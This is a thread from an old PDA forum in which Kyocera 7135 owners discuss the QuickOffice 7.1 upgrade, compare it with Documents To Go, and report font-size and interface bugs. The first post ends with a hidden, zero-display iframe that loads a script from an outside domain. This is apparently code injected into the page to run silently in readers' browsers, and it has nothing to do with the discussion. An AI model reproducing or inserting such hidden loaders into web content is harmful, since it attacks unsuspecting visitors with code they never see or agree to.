Quickoffice 7.1 just came out. Wondering if anyone has tried it with their 7135. Looks like a reasonable upgrade price of $19.95 for the Pro version and $29.95 for the Premiere version for the 7135 owners that already have QO.
Just wondering if it solves the problems that some people had with 7.0 being flaky.
Also, I've heard rumors that DataViz will have a new version of DocsToGo out this "Summer." Any more rumors to add on that?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've been using 7.1 on my 7135 since it came out, and had been using 7.0 since the day it came out (and all versions before that). So far it works great and does everything I need it to do. Getting a native Word/Excel file attached to an e-mail in SnapperMail, and then being able to open it and save it to my SD card, all on the fly, is awesome! I wasn't having any problems with 7.0, so I can't tell you whether or not 7.1 is more stable.

Thanks for the endorsement. If QuickOffice 7.x is good enough for you, I'll definitely give it a try.
As a registered DTG 4.0 user and Kyo 7135 owner with QOffice 6.x, the upgrade prices seem similar for both DTG 5.0 and QuickOffice 7.x.
I forgot to mention in my earlier post that www.pdageek.com has a good review comparing the three major Palm Office Suites. Docs to Go 5.0 got the nod over a beta of QuickOffice 7.0 but in a review update, QuickOffice 7.1 brought to about even. As a 7135 owner, e-mailing files sounds great but raises the price by needing to get Snapper Mail as well.
Dataviz will have 15 days to get their new version out or I'll end up defecting to QuickOffice.
By the way, do you use either of the included image programs: QuickPics with the 7.1 QuickOffice or JPegWatch Lite with SnapperMail? I didn't see QuickPics listed as being compatible with SnapperMail on the SnapperMail web site while many other image programs were listed. Could be just too recent of an addition to QuickOffice or perhaps they have their own file format for QuickPics.

I use Splash Photo, which is recognized by SnapperMail as an image viewer. I have also used JPegWatch Lite from time to time with no problems.
I haven't played with QuickPics much yet, but my understanding is that QuickPics allows you to drag and drop images into QuickPics, which then creates a QuickPoint compatible .pdb file. I do not believe that QuickPics is a standalone Palm app.

May not matter to too many people since we don't have a very active thread but in case anyone else is interested, it works fine on mine as well. The full install of QOffice, PrintBoy, spellcheck/thesaurus, and SnapperMail ended up weighing in at about 4 megs with some but not all of the example files.
General comments:
1. The user interface is a little more glitzy than DTG 5.0x.
2. The amount of included stuff is very impressive (spellcheck, thesaurus, and especially a full version of PrintBoy.)
3. Haven't tried the SnapperMail side but that could be very useful!
A couple of minor bugs or inconsistencies I ran across:
I ran into something unusual in my testing of the demo version of QuickWord 7.1.52 when I tried invoking a dictionary program to look up a word.
Bug #1: (Two cases highlight the problem)
Case 1: (Works as expected)
Not having a word highlighted in Quickword, it worked as expected.
1. Use the diagonal stroke to make a resident command. See a list of commands across the bottom including the Road Lingua Dictionary program.
Case 2:
Having a word highlighted (particularly one that I want to lookup), I use the same stroke to show the resident commands. There are many quickword commands but RoadLingua's dictionary is not visible. Perhaps this is because of the number of resident commands available in QuickWord but it would appear to be a bug in QuickWord.
---------------------------
Bug #2: Sometimes, small point is big and large point size is small
Using the Palm OS font:
Sizes 1-8 are big
Size 9 is small
Size 10 is big
Size 11-19 are small
Size 20-36 are big
-------
Using Times New Roman font:
Sizes 1-10 are big
Sizes 11-22 are small
Sizes 23 and larger are big
Similar things are visible with the other fonts (Verdana, Courier, and Arial)
I can understand font problems and only having two sizes, particularly if FontBucket is not being used but it seems like smaller font sizes should always map to smallest size. I don't recall the zoom setting but it was not changed. Oddly, QuickWord has a Preferences/Display Options field for "Enable FontBucket". It is not installed (verified by using FileZ) and it allows me to check the box without saying that it is not installed. Checking or unchecking the box doesn't affect the font size inconsistency described above.
Installation information:
Full installation of QuickOffice Premiere 7.1.52 except for fontbucket on Kyocera 7135 with PalmOS 4.1. After installation, 1.4 megs free.
-------------------
A couple of minor user interface issues:
1. The QuickWord program has an area for application level preferences while Quicksheet does not which seems a little inconsistent on the user interface.
2. The scrollbar not reaching to the bottom of the text window in QuickWord is a little unorthodox
3. The splash screen at the beginning gets old quickly.
4. Would be nice to have a little more screen reading control (guess it won't be replacing ReadThemAll, TIBR, etc.)
-------------------
All in all, looks like a great deal for us 7135'ers for $30. Thanks for the recommendation Robert.
